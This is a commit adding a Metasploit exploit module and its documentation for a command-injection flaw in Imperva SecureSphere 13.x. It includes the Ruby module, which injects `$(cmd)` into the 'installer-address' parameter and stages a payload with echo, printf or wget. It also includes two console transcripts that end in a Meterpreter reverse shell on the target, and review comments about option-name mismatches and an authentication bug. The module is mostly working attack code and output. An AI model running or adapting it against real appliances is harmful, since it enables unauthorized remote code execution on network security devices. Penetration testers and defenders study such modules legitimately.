Land #11210, imperva_securesphere_exec exploit

4.x
William Vu 2019-03-05 21:52:13 -06:00 committed by Metasploit
parent 44d6b0b4b8
commit db25dc7148
No known key found for this signature in database
GPG Key ID: CDFB5FA52007B954
2 changed files with 348 additions and 0 deletions


@ -0,0 +1,205 @@
## Description
This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode.
## Vulnerable Application
Imperva SecureSphere 13.0/13.1/13.2
## Verification Steps
1. `use exploit/linux/http/imperva_securesphere_exec`
2. `set RHOST [TARGET IP]`
3. `set PASS [Agent registration password]` if the target has been set to gateway mode
4. Run `check`
5. Verify that the result is `The target is vulnerable.`
6. `set payload linux/x64/meterpreter/reverse_tcp`
7. `set LHOST [IP]`
8. Run `exploit`
9. Verify that the reverse shell is obtained
## Scenarios
Imperva Secure 13.0 Pre-FTL mode:
```
msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
RHOST => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > show options
Module options (exploit/linux/http/imperva_securesphere_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASS no Agent registration password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.146.201 yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Use SSL
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /pws/impcli no The URI path to impcli
TIMEOUT 3 no HTTP connection timeout
URIPATH no The URI to use for this exploit (default is random)
USER imperva no Agent registration username
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.146.215 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Imperva SecureSphere 13.0/13.1/13.2
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload linux/x64/meterpreter/reverse_tcp
[*] Sending stage (816260 bytes) to 192.168.146.201
[*] Command Stager progress - 100.00% done (1321/1321 bytes)
meterpreter > sysinfo
Computer : localhost.localdomain
OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
Process 4965 created.
Channel 1 created.
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99
inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1331 errors:0 dropped:0 overruns:0 frame:0
TX packets:825 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1790319 (1.7 MiB) TX bytes:83116 (81.1 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit
```
Imperva SecureSphere 13.0 Gateway mode (Requires agent registration credential):
```
msf5 > use exploit/linux/http/imperva_securesphere_exec
msf5 exploit(linux/http/imperva_securesphere_exec) > set RHOST 192.168.146.201
RHOST => 192.168.146.201
msf5 exploit(linux/http/imperva_securesphere_exec) > set PASS lshy5782%lsLS
PASS => lshy5782%lsLS
msf5 exploit(linux/http/imperva_securesphere_exec) > check
[+] 192.168.146.201:443 The target is vulnerable.
msf5 exploit(linux/http/imperva_securesphere_exec) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf5 exploit(linux/http/imperva_securesphere_exec) > set LHOST 192.168.146.215
LHOST => 192.168.146.215
msf5 exploit(linux/http/imperva_securesphere_exec) > show options
Module options (exploit/linux/http/imperva_securesphere_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
PASS lshy5782%lsLS no Agent registration password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.146.201 yes The target address range or CIDR identifier
RPORT 443 yes The target port (TCP)
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL true no Use SSL
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI /pws/impcli no The URI path to impcli
TIMEOUT 3 no HTTP connection timeout
URIPATH no The URI to use for this exploit (default is random)
USER imperva no Agent registration username
VHOST no HTTP server virtual host
Payload options (linux/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.146.215 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Imperva SecureSphere 13.0/13.1/13.2
msf5 exploit(linux/http/imperva_securesphere_exec) > exploit
[*] Started reverse TCP handler on 192.168.146.215:4444
[*] Sending payload linux/x64/meterpreter/reverse_tcp
[*] Sending stage (816260 bytes) to 192.168.146.201
[*] Command Stager progress - 100.00% done (1321/1321 bytes)
meterpreter > sysinfo
Computer : 192.168.146.201
OS : Red Hat 6.3 (Linux 2.6.32-279.el6.imp8.numa.x86_64)
Architecture : x64
BuildTuple : x86_64-linux-musl
Meterpreter : x64/linux
meterpreter > shell
Process 19634 created.
Channel 1 created.
id
uid=497(lighttpd) gid=497(lighttpd) groups=497(lighttpd)
/sbin/ifconfig
eth0 Link encap:Ethernet HWaddr 00:0C:29:DE:50:99
inet addr:192.168.146.201 Bcast:192.168.146.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fede:5099/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:651 errors:0 dropped:0 overruns:0 frame:0
TX packets:451 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:894174 (873.2 KiB) TX bytes:37181 (36.3 KiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:153 errors:0 dropped:0 overruns:0 frame:0
TX packets:153 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:21579 (21.0 KiB) TX bytes:21579 (21.0 KiB)
exit
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.146.201 - Meterpreter session 1 closed. Reason: User exit
```
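Review bot: The Verification Steps and both Scenario transcripts use `set PASS` and list `PASS`/`USER` with a `TIMEOUT` default of 3, but the module added in this same commit registers `USERNAME`, `PASSWORD` (required, default `''`) and `TIMEOUT` with a default of 15, so a reader following step 3 will hit an unknown-option error; regenerate the `show options` output from the module as committed and change step 3 to `set PASSWORD [Agent registration password]`. The first scenario heading also reads "Imperva Secure 13.0 Pre-FTL mode" and is missing "Sphere".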


@ -0,0 +1,143 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Imperva SecureSphere PWS Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in Imperva
SecureSphere 13.x. The vulnerability exists in the PWS service,
where Python CGIs didn't properly sanitize user supplied command
parameters and directly passes them to corresponding CLI utility,
leading to command injection. Agent registration credential is
required to exploit SecureSphere in gateway mode.
This module was successfully tested on Imperva SecureSphere 13.0/13.1/
13.2 in pre-ftl mode and unsealed gateway mode.
),
'License' => MSF_LICENSE,
'Author' =>
[
'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module
],
'References' =>
[
[ 'EDB', '45542' ]
],
'DisclosureDate' => "Oct 8 2018",
'DefaultOptions' => {
'SSL' => true,
'PrependFork' => true,
},
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'CmdStagerFlavor' => %w{ echo printf wget },
'Targets' =>
[
['Imperva SecureSphere 13.0/13.1/13.2', {}]
],
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(443),
OptString.new('USERNAME', [true, 'Agent registration username', 'imperva']),
OptString.new('PASSWORD', [true, 'Agent registration password', '']),
OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),
OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])
])
register_advanced_options [
OptBool.new('ForceExploit', [false, 'Override check result', false])
]
end
def check
begin
res = execute_command('id')
rescue => e
vprint_error("#{e}")
return CheckCode::Unknown
end
if res.body =~ /uid=\d+/
return CheckCode::Vulnerable
end
CheckCode::Safe
end
def exploit
unless CheckCode::Vulnerable == check
unless datastore['ForceExploit']
fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')
end
print_warning 'Target does not appear to be vulnerable'
end
print_status("Sending payload #{datastore['PAYLOAD']}")
execute_cmdstager
end
def execute_command(cmd, opts = {})
data = {
'command' => 'impctl server status',
'parameters' => {
'broadcast' => true,
'installer-address' => "127.0.0.1 $(#{cmd})"
}
}
res = send_request data
return unless res
if res.code == 401
fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')
end
unless res.code == 406 && res.body.include?("impctl")
fail_with(Failure::Unknown, 'Server did not respond in an expected way')
end
res
end
def send_request(data)
req_params = {
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'data' => data.to_json
}
if datastore['USERNAME'] && datastore['PASSWORD']
unless @cookie
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri('/')
})
unless res
fail_with(Failure::Unreachable, "#{peer} - Connection failed")
end
@cookie = res.get_cookies
end
req_params['cookie'] = @cookie
req_params['headers'] = {
'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])
}
end
send_request_cgi(req_params, datastore['TIMEOUT'])
end
end
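Review bot: In `send_request`, `if datastore['USERNAME'] && datastore['PASSWORD']` can never be false, because `PASSWORD` is registered as required with default `''` and an empty string is truthy in Ruby; the module therefore always fetches a cookie and sends a Basic `Authorization` header, even in pre-FTL mode where the documentation says no credential is needed. Test `datastore['PASSWORD'].present?` instead (or register `PASSWORD` as optional and check `.blank?`) so the unauthenticated path is actually reachable. Related: `execute_command` returns `nil` when `send_request` gets no response, and `check` then calls `res.body` on `nil`, which only the broad `rescue` catches and reports, under verbose only, as a NoMethodError; return `CheckCode::Unknown` explicitly when `res` is nil, and consider `print_error` rather than `vprint_error` for the 401 case so a user without credentials learns why `check` came back Unknown.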